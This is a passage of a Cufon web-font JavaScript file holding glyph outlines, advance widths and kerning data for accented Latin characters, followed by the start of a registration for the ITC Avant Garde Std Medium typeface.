d":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"\u00c0":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0xm84,-344r86,48r-8,18r-87,-46","w":255,"k":{"v":15,"y":13,"\u00fd":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"\u00c5":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0xm128,-348v20,0,37,16,37,37v0,20,-16,37,-37,37v-21,0,-37,-17,-37,-37v0,-21,17,-37,37,-37xm148,-311v0,-12,-8,-21,-21,-21v-11,0,-20,10,-20,21v0,11,10,20,21,20v12,0,20,-9,20,-20","w":255,"k":{"v":15,"y":13,"\u00fd":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"\u00c3":{"d":"66,-75r-31,75r-32,0r111,-266r29,0r110,266r-32,0r-31,-75r-124,0xm181,-99r-54,-134r-52,134r106,0xm60,-313v32,-37,92,17,125,-12r11,18v-32,37,-92,-20,-125,12","w":255,"k":{"v":15,"y":13,"\u00fd":13,"\u00ff":13,"C":14,"\u00c7":14,"G":14,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"Q":14,"T":28,"u":12,"\u00fa":12,"\u00fb":12,"\u00fc":12,"\u00f9":12,"U":12,"\u00da":12,"\u00db":12,"\u00dc":12,"\u00d9":12,"V":36,"w":12,"W":18,"Y":34,"\u00dd":34,"\u0178":34}},"\u00c7":{"d":"154,5r-7,15v18,-5,33,9,33,27v0,31,-50,51,-62,4r16,0v6,19,31,15,31,-4v0,-16,-22,-20,-29,-7r-13,-5r15,-31v-71,-7,-124,-65,-124,-137v0,-76,59,-138,139,-138v66,0,108,44,123,78r-32,0v-9,-16,-40,-52,-91,-52v-62,0,-109,49,-109,111v0,63,47,112,109,112v56,0,85,-40,91,-50r32,0v-17,40,-63,76,-122,77","w":288,"k":{",":5,".":5,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17}},"\u00c9":{"d":"27,0r0,-266r147,0r0,26r-118,0r0,92r118,0r0,27r-118,0r0,95r118,0r0,26r-147,0xm54,-300r86,-48r9,19r-86,46","w":194},"\u00ca":{"d":"27,0r0,-266r147,0r0,26r-118,0r0,92r118,0r0,27r-118,0r0,95r118,0r0,26r-147,0xm107,-337r63,48r-30,0r-43,-30r-43,30r-30,0r64,-48r19,0","w":194},"\u00cb":{"d":"27,0r0,-266r147,0r0,26r-118,0r0,92r118,0r0,27r-118,0r0,95r118,0r0,26r-147,0xm76,-336r0,46r-26,0r0,-46r26,0xm144,-336r0,46r-26,0r0,-46r26,0","w":194},"\u00c8":{"d":"27,0r0,-266r147,0r0,26r-118,0r0,92r118,0r0,27r-118,0r0,95r118,0r0,26r-147,0xm55,-347r86,48r-9,17r-87,-46","w":194},"\u00cd":{"d":"27,0r0,-266r29,0r0,266r-29,0xm6,-299r86,-48r9,19r-86,46","w":83},"\u00ce":{"d":"27,0r0,-266r29,0r0,266r-29,0xm51,-335r63,48r-29,0r-44,-29r-42,29r-30,0r63,-48r19,0","w":83},"\u00cf":{"d":"27,0r0,-266r29,0r0,266r-29,0xm21,-334r0,45r-26,0r0,-45r26,0xm88,-334r0,45r-26,0r0,-45r26,0","w":83},"\u00cc":{"d":"27,0r0,-266r29,0r0,266r-29,0xm-9,-346r86,48r-9,17r-86,-46","w":83},"\u00d1":{"d":"57,-266r156,222r0,-222r29,0r0,266r-29,0r-158,-224r0,224r-28,0r0,-266r30,0xm66,-312v32,-37,92,18,125,-12r11,18v-32,37,-90,-18,-125,12","w":268},"\u00d3":{"d":"14,-132v0,-82,64,-139,139,-139v78,0,139,60,139,138v0,78,-61,138,-139,138v-79,0,-139,-61,-139,-137xm153,-245v-63,0,-109,49,-109,112v0,63,47,111,109,111v63,0,109,-50,109,-111v0,-61,-46,-112,-109,-112xm110,-300r85,-48r10,19r-87,46","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u00d4":{"d":"14,-132v0,-82,64,-139,139,-139v78,0,139,60,139,138v0,78,-61,138,-139,138v-79,0,-139,-61,-139,-137xm153,-245v-63,0,-109,49,-109,112v0,63,47,111,109,111v63,0,109,-50,109,-111v0,-61,-46,-112,-109,-112xm163,-336r63,48r-30,0r-43,-30r-43,30r-30,0r64,-48r19,0","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u00d6":{"d":"14,-132v0,-82,64,-139,139,-139v78,0,139,60,139,138v0,78,-61,138,-139,138v-79,0,-139,-61,-139,-137xm153,-245v-63,0,-109,49,-109,112v0,63,47,111,109,111v63,0,109,-50,109,-111v0,-61,-46,-112,-109,-112xm132,-336r0,46r-26,0r0,-46r26,0xm200,-336r0,46r-26,0r0,-46r26,0","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u00d2":{"d":"14,-132v0,-82,64,-139,139,-139v78,0,139,60,139,138v0,78,-61,138,-139,138v-79,0,-139,-61,-139,-137xm153,-245v-63,0,-109,49,-109,112v0,63,47,111,109,111v63,0,109,-50,109,-111v0,-61,-46,-112,-109,-112xm111,-347r86,48r-9,17r-87,-46","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u00d5":{"d":"14,-132v0,-82,64,-139,139,-139v78,0,139,60,139,138v0,78,-61,138,-139,138v-79,0,-139,-61,-139,-137xm153,-245v-63,0,-109,49,-109,112v0,63,47,111,109,111v63,0,109,-50,109,-111v0,-61,-46,-112,-109,-112xm85,-312v32,-37,92,18,125,-12r11,18v-32,37,-90,-18,-125,12","w":306,"k":{"T":18,"V":17,"W":5,"Y":15,"\u00dd":15,"\u0178":15,",":15,".":15,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"X":14}},"\u0160":{"d":"49,-200v0,69,133,36,131,127v0,44,-33,78,-83,78v-45,0,-81,-28,-83,-79r30,0v4,44,36,53,53,53v28,0,53,-20,53,-50v0,-81,-128,-30,-131,-127v-3,-91,147,-103,155,-4r-30,0v-3,-17,-12,-44,-47,-44v-27,0,-48,18,-48,46xm24,-333r30,0r43,30r42,-30r31,0r-63,48r-21,0","w":192,"k":{",":7,".":10}},"\u00da":{"d":"203,-98v12,77,-81,137,-147,83v-28,-23,-30,-54,-30,-83r0,-168r30,0r0,168v-5,39,18,76,59,76v40,0,58,-36,58,-76r0,-168r30,0r0,168xm75,-296r86,-49r10,20r-87,46","w":228,"k":{",":12,".":12,"A":12,"\u00c6":12,"\u00c1":12,"\u00c2":12,"\u00c4":12,"\u00c0":12,"\u00c5":12,"\u00c3":12}},"\u00db":{"d":"203,-98v12,77,-81,137,-147,83v-28,-23,-30,-54,-30,-83r0,-168r30,0r0,168v-5,39,18,76,59,76v40,0,58,-36,58,-76r0,-168r30,0r0,168xm125,-334r63,48r-31,0r-43,-29r-42,29r-31,0r64,-48r20,0","w":228,"k":{",":12,".":12,"A":12,"\u00c6":12,"\u00c1":12,"\u00c2":12,"\u00c4":12,"\u00c0":12,"\u00c5":12,"\u00c3":12}},"\u00dc":{"d":"203,-98v12,77,-81,137,-147,83v-28,-23,-30,-54,-30,-83r0,-168r30,0r0,168v-5,39,18,76,59,76v40,0,58,-36,58,-76r0,-168r30,0r0,168xm94,-332r0,46r-26,0r0,-46r26,0xm161,-332r0,46r-26,0r0,-46r26,0","w":228,"k":{",":12,".":12,"A":12,"\u00c6":12,"\u00c1":12,"\u00c2":12,"\u00c4":12,"\u00c0":12,"\u00c5":12,"\u00c3":12}},"\u00d9":{"d":"203,-98v12,77,-81,137,-147,83v-28,-23,-30,-54,-30,-83r0,-168r30,0r0,168v-5,39,18,76,59,76v40,0,58,-36,58,-76r0,-168r30,0r0,168xm60,-344r87,49r-9,17r-87,-46","w":228,"k":{",":12,".":12,"A":12,"\u00c6":12,"\u00c1":12,"\u00c2":12,"\u00c4":12,"\u00c0":12,"\u00c5":12,"\u00c3":12}},"\u00dd":{"d":"90,0r0,-94r-85,-172r32,0r68,144r69,-144r32,0r-86,172r0,94r-30,0xm73,-296r86,-49r10,20r-87,46","w":210,"k":{"v":12,"O":15,"\u00d8":15,"\u0152":15,"\u00d3":15,"\u00d4":15,"\u00d6":15,"\u00d2":15,"\u00d5":15,"u":28,"\u00fa":28,"\u00fb":28,"\u00fc":28,"\u00f9":28,",":48,".":48,"A":34,"\u00c6":34,"\u00c1":34,"\u00c2":34,"\u00c4":34,"\u00c0":34,"\u00c5":34,"\u00c3":34,"a":37,"\u00e6":37,"\u00e1":37,"\u00e2":37,"\u00e4":37,"\u00e0":37,"\u00e5":37,"\u00e3":37,"e":37,"\u00e9":37,"\u00ea":37,"\u00eb":37,"\u00e8":37,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":37,"\u00f8":37,"\u0153":37,"\u00f3":37,"\u00f4":37,"\u00f6":37,"\u00f2":37,"\u00f5":37,"q":37,"-":41,":":21,";":23,"p":25,"S":14,"\u0160":14}},"\u0178":{"d":"90,0r0,-94r-85,-172r32,0r68,144r69,-144r32,0r-86,172r0,94r-30,0xm85,-332r0,46r-27,0r0,-46r27,0xm152,-332r0,46r-26,0r0,-46r26,0","w":210,"k":{"v":12,"O":15,"\u00d8":15,"\u0152":15,"\u00d3":15,"\u00d4":15,"\u00d6":15,"\u00d2":15,"\u00d5":15,"u":28,"\u00fa":28,"\u00fb":28,"\u00fc":28,"\u00f9":28,",":48,".":48,"A":34,"\u00c6":34,"\u00c1":34,"\u00c2":34,"\u00c4":34,"\u00c0":34,"\u00c5":34,"\u00c3":34,"a":37,"\u00e6":37,"\u00e1":37,"\u00e2":37,"\u00e4":37,"\u00e0":37,"\u00e5":37,"\u00e3":37,"e":37,"\u00e9":37,"\u00ea":37,"\u00eb":37,"\u00e8":37,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":37,"\u00f8":37,"\u0153":37,"\u00f3":37,"\u00f4":37,"\u00f6":37,"\u00f2":37,"\u00f5":37,"q":37,"-":41,":":21,";":23,"p":25,"S":14,"\u0160":14}},"\u017d":{"d":"171,-244r-128,218r133,0r0,26r-169,0r0,-19r131,-221r-135,0r0,-26r168,0r0,22xm15,-332r30,0r43,30r43,-30r30,0r-63,48r-20,0","w":179},"\u00e1":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78xm79,-233r86,-49r9,20r-87,46","w":246},"\u00e2":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78xm131,-271r63,48r-29,0r-44,-29r-43,29r-29,0r63,-48r19,0","w":246},"\u00e4":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78xm98,-269r0,46r-26,0r0,-46r26,0xm166,-269r0,46r-26,0r0,-46r26,0","w":246},"\u00e0":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78xm79,-281r86,49r-9,17r-87,-46","w":246},"\u00e5":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78xm81,-248v0,-21,17,-37,38,-37v20,0,37,16,37,37v0,20,-17,37,-38,37v-21,0,-37,-17,-37,-37xm118,-269v-11,0,-20,10,-20,21v0,11,8,20,20,20v12,0,21,-9,21,-20v0,-12,-9,-21,-21,-21","w":246},"\u00e3":{"d":"220,-194r0,194r-26,0r0,-40v-15,29,-45,45,-80,45v-63,0,-100,-49,-100,-102v0,-57,41,-102,100,-102v41,0,71,24,80,46r0,-41r26,0xm194,-97v0,-47,-33,-78,-77,-78v-45,0,-77,35,-77,79v0,35,25,77,78,77v45,0,76,-32,76,-78xm54,-247v33,-36,93,19,125,-12r11,18v-32,37,-92,-18,-124,13","w":246},"\u00e7":{"d":"187,-127v-29,-76,-147,-54,-147,30v0,46,35,78,77,78v37,0,62,-24,70,-47r28,0v-13,41,-49,70,-97,71r-7,15v18,-5,34,9,34,27v0,31,-50,51,-62,4r15,0v7,19,30,16,31,-4v0,-16,-21,-20,-28,-7r-13,-5r14,-31v-50,-6,-88,-46,-88,-101v0,-57,44,-102,102,-102v44,0,86,26,99,72r-28,0","w":226,"k":{",":2,"h":2,"k":2,"l":2,"\u0142":2}},"\u00e9":{"d":"208,-58v-16,37,-47,62,-95,63v-67,0,-102,-53,-102,-101v0,-87,112,-137,173,-76v22,22,33,52,30,83r-176,0v4,84,113,92,142,31r28,0xm38,-111r150,0v-2,-34,-35,-65,-75,-65v-42,0,-72,30,-75,65xm68,-233r86,-49r10,20r-87,46","w":226,"k":{"v":6,"y":6,"\u00fd":6,"\u00ff":6,"w":5,",":2,".":3,"x":5}},"\u00ea":{"d":"208,-58v-16,37,-47,62,-95,63v-67,0,-102,-53,-102,-101v0,-87,112,-137,173,-76v22,22,33,52,30,83r-176,0v4,84,113,92,142,31r28,0xm38,-111r150,0v-2,-34,-35,-65,-75,-65v-42,0,-72,30,-75,65xm123,-271r63,48r-30,0r-43,-29r-43,29r-30,0r63,-48r20,0","w":226,"k":{"v":6,"y":6,"\u00fd":6,"\u00ff":6,"w":5,",":2,".":3,"x":5}},"\u00eb":{"d":"208,-58v-16,37,-47,62,-95,63v-67,0,-102,-53,-102,-101v0,-87,112,-137,173,-76v22,22,33,52,30,83r-176,0v4,84,113,92,142,31r28,0xm38,-111r150,0v-2,-34,-35,-65,-75,-65v-42,0,-72,30,-75,65xm91,-269r0,46r-26,0r0,-46r26,0xm159,-269r0,46r-26,0r0,-46r26,0","w":226,"k":{"v":6,"y":6,"\u00fd":6,"\u00ff":6,"w":5,",":2,".":3,"x":5}},"\u00e8":{"d":"208,-58v-16,37,-47,62,-95,63v-67,0,-102,-53,-102,-101v0,-87,112,-137,173,-76v22,22,33,52,30,83r-176,0v4,84,113,92,142,31r28,0xm38,-111r150,0v-2,-34,-35,-65,-75,-65v-42,0,-72,30,-75,65xm71,-281r86,49r-9,17r-87,-46","w":226,"k":{"v":6,"y":6,"\u00fd":6,"\u00ff":6,"w":5,",":2,".":3,"x":5}},"\u00ed":{"d":"26,0r0,-194r27,0r0,194r-27,0xm3,-233r86,-49r9,20r-86,46","w":78},"\u00ee":{"d":"26,0r0,-194r27,0r0,194r-27,0xm49,-271r63,48r-30,0r-43,-29r-43,29r-29,0r63,-48r19,0","w":78},"\u00ef":{"d":"26,0r0,-194r27,0r0,194r-27,0xm18,-269r0,46r-26,0r0,-46r26,0xm86,-269r0,46r-26,0r0,-46r26,0","w":78},"\u00ec":{"d":"26,0r0,-194r27,0r0,194r-27,0xm-11,-281r86,49r-8,17r-87,-46","w":78},"\u00f1":{"d":"26,0r0,-194r25,0r0,35v11,-25,37,-41,72,-40v103,2,78,105,81,199r-26,0v-3,-76,21,-174,-62,-174v-82,0,-61,98,-63,174r-27,0xm47,-247v33,-36,93,19,125,-12r11,18v-32,37,-93,-18,-125,13","w":229,"k":{"v":10,"y":12,"\u00fd":12,"\u00ff":12,"u":6,"\u00fa":6,"\u00fb":6,"\u00fc":6,"\u00f9":6}},"\u00f3":{"d":"14,-97v0,-54,41,-102,103,-102v63,0,103,48,103,102v0,54,-40,102,-103,102v-62,0,-103,-48,-103,-102xm117,-174v-43,0,-77,33,-77,78v0,44,34,77,77,77v43,0,76,-34,76,-78v0,-44,-33,-77,-76,-77xm72,-233r86,-49r10,20r-87,46","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u00f4":{"d":"14,-97v0,-54,41,-102,103,-102v63,0,103,48,103,102v0,54,-40,102,-103,102v-62,0,-103,-48,-103,-102xm117,-174v-43,0,-77,33,-77,78v0,44,34,77,77,77v43,0,76,-34,76,-78v0,-44,-33,-77,-76,-77xm127,-271r63,48r-30,0r-43,-29r-43,29r-30,0r63,-48r20,0","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u00f6":{"d":"14,-97v0,-54,41,-102,103,-102v63,0,103,48,103,102v0,54,-40,102,-103,102v-62,0,-103,-48,-103,-102xm117,-174v-43,0,-77,33,-77,78v0,44,34,77,77,77v43,0,76,-34,76,-78v0,-44,-33,-77,-76,-77xm96,-269r0,46r-26,0r0,-46r26,0xm164,-269r0,46r-26,0r0,-46r26,0","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u00f2":{"d":"14,-97v0,-54,41,-102,103,-102v63,0,103,48,103,102v0,54,-40,102,-103,102v-62,0,-103,-48,-103,-102xm117,-174v-43,0,-77,33,-77,78v0,44,34,77,77,77v43,0,76,-34,76,-78v0,-44,-33,-77,-76,-77xm75,-281r85,49r-8,17r-87,-46","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u00f5":{"d":"14,-97v0,-54,41,-102,103,-102v63,0,103,48,103,102v0,54,-40,102,-103,102v-62,0,-103,-48,-103,-102xm117,-174v-43,0,-77,33,-77,78v0,44,34,77,77,77v43,0,76,-34,76,-78v0,-44,-33,-77,-76,-77xm49,-247v33,-36,93,19,125,-12r11,18v-32,37,-93,-18,-125,13","w":233,"k":{"v":9,"y":8,"\u00fd":8,"\u00ff":8,"w":7,",":9,".":10,"x":10}},"\u0161":{"d":"118,-53v0,-48,-98,-32,-98,-91v0,-69,115,-78,119,-1r-26,0v0,-21,-14,-32,-33,-32v-21,0,-36,14,-34,31v6,49,99,23,99,90v0,36,-27,61,-64,61v-31,0,-67,-19,-67,-60r27,0v0,52,77,47,77,2xm8,-269r30,0r43,30r43,-30r30,0r-63,48r-20,0","w":162,"k":{"w":8,",":4,".":5}},"\u00fa":{"d":"204,-194r0,194r-25,0r0,-35v-11,25,-37,40,-72,40v-103,-2,-78,-105,-81,-199r26,0v3,76,-21,175,62,175v82,0,61,-99,63,-175r27,0xm76,-233r86,-49r9,20r-86,46","w":230},"\u00fb":{"d":"204,-194r0,194r-25,0r0,-35v-11,25,-37,40,-72,40v-103,-2,-78,-105,-81,-199r26,0v3,76,-21,175,62,175v82,0,61,-99,63,-175r27,0xm125,-271r63,48r-30,0r-43,-29r-43,29r-30,0r63,-48r20,0","w":230},"\u00fc":{"d":"204,-194r0,194r-25,0r0,-35v-11,25,-37,40,-72,40v-103,-2,-78,-105,-81,-199r26,0v3,76,-21,175,62,175v82,0,61,-99,63,-175r27,0xm94,-269r0,46r-26,0r0,-46r26,0xm162,-269r0,46r-26,0r0,-46r26,0","w":230},"\u00f9":{"d":"204,-194r0,194r-25,0r0,-35v-11,25,-37,40,-72,40v-103,-2,-78,-105,-81,-199r26,0v3,76,-21,175,62,175v82,0,61,-99,63,-175r27,0xm61,-281r86,49r-9,17r-87,-46","w":230},"\u00fd":{"d":"45,73r33,-77r-75,-190r28,0r61,157r63,-157r29,0r-111,267r-28,0xm60,-233r86,-49r10,20r-87,46","w":184,"k":{",":31,".":32,"a":8,"\u00e6":8,"\u00e1":8,"\u00e2":8,"\u00e4":8,"\u00e0":8,"\u00e5":8,"\u00e3":8,"e":8,"\u00e9":8,"\u00ea":8,"\u00eb":8,"\u00e8":8,"o":8,"\u00f8":8,"\u0153":8,"\u00f3":8,"\u00f4":8,"\u00f6":8,"\u00f2":8,"\u00f5":8,"r":2}},"\u00ff":{"d":"45,73r33,-77r-75,-190r28,0r61,157r63,-157r29,0r-111,267r-28,0xm71,-269r0,46r-26,0r0,-46r26,0xm139,-269r0,46r-26,0r0,-46r26,0","w":184,"k":{",":31,".":32,"a":8,"\u00e6":8,"\u00e1":8,"\u00e2":8,"\u00e4":8,"\u00e0":8,"\u00e5":8,"\u00e3":8,"e":8,"\u00e9":8,"\u00ea":8,"\u00eb":8,"\u00e8":8,"o":8,"\u00f8":8,"\u0153":8,"\u00f3":8,"\u00f4":8,"\u00f6":8,"\u00f2":8,"\u00f5":8,"r":2}},"\u017e":{"d":"5,0r0,-19r107,-153r-103,0r0,-22r133,0r0,22r-105,151r109,0r0,21r-141,0xm4,-268r29,0r44,30r43,-30r29,0r-63,47r-20,0","w":150},"\u00ad":{"d":"0,-114r98,0r0,26r-98,0r0,-26","w":97},"\u00a0":{"w":103}}});

Cufon.registerFont({"w":212,"face":{"font-family":"ITC Avant Garde Std Md","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 2 2 2 2 4","ascent":"266","descent":"-94","x-height":"5","bbox":"-31 -354 389.385 96.6158","underline-thickness":"18","underline-position":"-18","stemh":"35","stemv":"37","unicode-range":"U+0020-U+0192"},"glyphs":{" ":{"w":106,"k":{"T":31,"V":30,"W":14,"Y":36,"\u00dd":36,"\u0178":36,"A":15,"\u00c6":15,"\u00c1":15,"\u00c2":15,"\u00c4":15,"\u00c0":15,"\u00c5":15,"\u00c3":15}},"!":{"d":"73,-266r0,191r-38,0r0,-191r38,0xm73,-47r0,47r-38,0r0,-47r38,0","w":108},"\"":{"d":"59,-160r-29,0r0,-106r29,0r0,106xm116,-160r-30,0r0,-106r30,0r0,106","w":145},"#":{"d":"144,-90r-10,74r-26,0r10,-74r-38,0r-11,74r-27,0r11,-74r-44,0r3,-25r45,0r5,-37r-45,0r4,-26r44,0r10,-67r26,0r-9,67r38,0r10,-67r26,0r-9,67r46,0r-3,26r-47,0r-5,37r46,0r-2,25r-48,0xm122,-115r5,-37r-39,0r-5,37r39,0"},"$":{"d":"144,-78v0,-67,-109,-28,-109,-113v0,-39,27,-62,57,-68r0,-33r31,0r0,33v34,6,53,32,54,64r-36,0v-3,-45,-67,-44,-67,0v0,26,22,35,53,44v73,21,75,122,-4,140r0,35r-31,0r0,-35v-39,-5,-62,-37,-63,-70r39,0v1,53,76,50,76,3"},"%":{"d":"73,-147v-35,0,-62,-27,-62,-63v0,-35,27,-61,62,-61v35,0,62,27,62,62v0,35,-27,62,-62,62xm37,-209v0,20,15,36,36,36v20,0,35,-16,35,-37v0,-21,-14,-36,-35,-36v-21,0,-36,16,-36,37xm214,5v-35,0,-62,-26,-62,-63v0,-35,27,-62,62,-62v35,0,62,28,62,63v0,35,-28,62,-62,62xm178,-57v0,20,15,36,36,36v20,0,35,-15,35,-36v0,-21,-15,-36,-35,-36v-21,0,-36,15,-36,36xm224,-266r-135,266r-28,0r135,-266r28,0","w":286},"&":{"d":"208,-162r40,0r-46,87r53,54r-26,26r-47,-49v-14,28,-35,49,-78,49v-53,0,-85,-36,-85,-76v0,-43,35,-65,59,-78v-18,-19,-31,-36,-31,-59v0,-35,29,-63,66,-63v37,0,65,28,65,62v0,36,-27,51,-47,62r46,47xm113,-240v-17,0,-29,15,-29,30v0,18,15,31,25,42v22,-12,35,-22,35,-42v0,-16,-13,-30,-31,-30xm157,-69r-56,-56v-30,15,-41,32,-41,51v0,24,18,43,45,43v27,0,40,-15,52,-38","w":266},"(":{"d":"149,-271r0,42v-39,21,-78,74,-78,142v0,67,37,119,78,141r0,42v-160,-72,-159,-296,0,-367","w":162},")":{"d":"14,96r0,-41v39,-21,78,-74,78,-142v0,-67,-37,-120,-78,-142r0,-42v160,72,159,296,0,367","w":162},"*":{"d":"126,-266r-6,50r40,-31r12,23r-45,19r46,19r-14,24r-40,-31r7,50r-26,0r6,-51r-40,32r-13,-24r46,-19r-46,-19r13,-23r41,31r-7,-50r26,0","w":225},"+":{"d":"126,-181r0,72r72,0r0,37r-72,0r0,72r-36,0r0,-72r-72,0r0,-37r72,0r0,-72r36,0","w":216},",":{"d":"73,-47r-29,74r-33,0r23,-74r39,0","w":106,"k":{" ":46}},"-":{"d":"0,-121r99,0r0,37r-99,0r0,-37","w":98},".":{"d":"73,-47r0,47r-39,0r0,-47r39,0","w":106,"k":{" ":46}},"\/":{"d":"25,36r109,-302r42,0r-109,302r-42,0","w":201},"0":{"d":"13,-89r0,-87v0,-77,63,-95,93,-95v40,0,93,27,93,94r0,88v0,72,-59,94,-92,94v-35,0,-94,-23,-94,-94xm105,-234v-64,0,-49,83,-50,146v0,30,19,56,51,56v29,0,51,-26,51,-56v0,-67,24,-146,-52,-146"},"1":{"d":"89,0r0,-230r-50,0r0,-36r92,0r0,266r-42,0"},"2":{"d":"19,0r0,-33r83,-78v26,-23,50,-43,50,-75v0,-30,-20,-48,-46,-48v-28,0,-45,24,-46,58r-40,0v1,-23,6,-46,21,-64v51,-64,157,-23,153,51v-3,66,-80,110,-117,153r118,0r0,36r-176,0"},"3":{"d":"68,-198r-42,0v4,-102,153,-90,152,-5v0,30,-19,47,-36,56v48,17,52,55,52,69v4,81,-120,112,-165,49v-11,-16,-16,-34,-16,-49r43,0v1,26,20,46,48,46v30,0,48,-22,48,-49v-1,-34,-33,-52,-74,-47r0,-32v34,4,59,-15,58,-38v0,-20,-12,-36,-33,-36v-25,0,-34,20,-35,36"},"4":{"d":"131,0r0,-49r-127,0r0,-32r126,-185r42,0r0,183r28,0r0,34r-28,0r0,49r-41,0xm47,-83r86,0r0,-132"},"5":{"d":"46,-266r135,0r0,36r-103,0r-11,65v9,-6,21,-14,45,-14v124,0,113,184,-8,184v-47,0,-88,-31,-95,-80r42,0v12,63,109,51,107,-13v-1,-51,-69,-82,-101,-29r-35,-9"},"6":{"d":"107,5v-87,0,-119,-100,-74,-165r73,-106r48,0r-63,91v52,-23,112,17,112,83v0,55,-42,97,-96,97xm106,-145v-26,0,-56,19,-55,58v0,32,23,55,54,55v32,0,56,-25,56,-56v0,-34,-26,-57,-55,-57"},"7":{"d":"27,-266r159,0r0,33r-105,233r-46,0r107,-230r-115,0r0,-36"},"8":{"d":"59,-148v-53,-27,-36,-123,47,-123v82,0,102,95,47,123v77,32,41,153,-47,153v-88,0,-124,-120,-47,-153xm69,-199v0,21,16,37,37,37v21,0,38,-16,38,-37v0,-21,-17,-38,-38,-38v-21,0,-37,17,-37,38xm106,-129v-28,0,-47,22,-47,49v0,25,19,48,47,48v28,0,48,-24,48,-49v0,-26,-20,-48,-48,-48"},"9":{"d":"106,-271v86,0,118,101,74,165r-73,106r-49,0r64,-91v-52,23,-113,-18,-113,-84v0,-55,43,-96,97,-96xm161,-179v0,-32,-23,-55,-54,-55v-31,0,-55,25,-55,56v0,34,26,56,54,56v26,0,55,-20,55,-57"},":":{"d":"73,-196r0,47r-39,0r0,-47r39,0xm73,-47r0,47r-39,0r0,-47r39,0","w":106,"k":{" 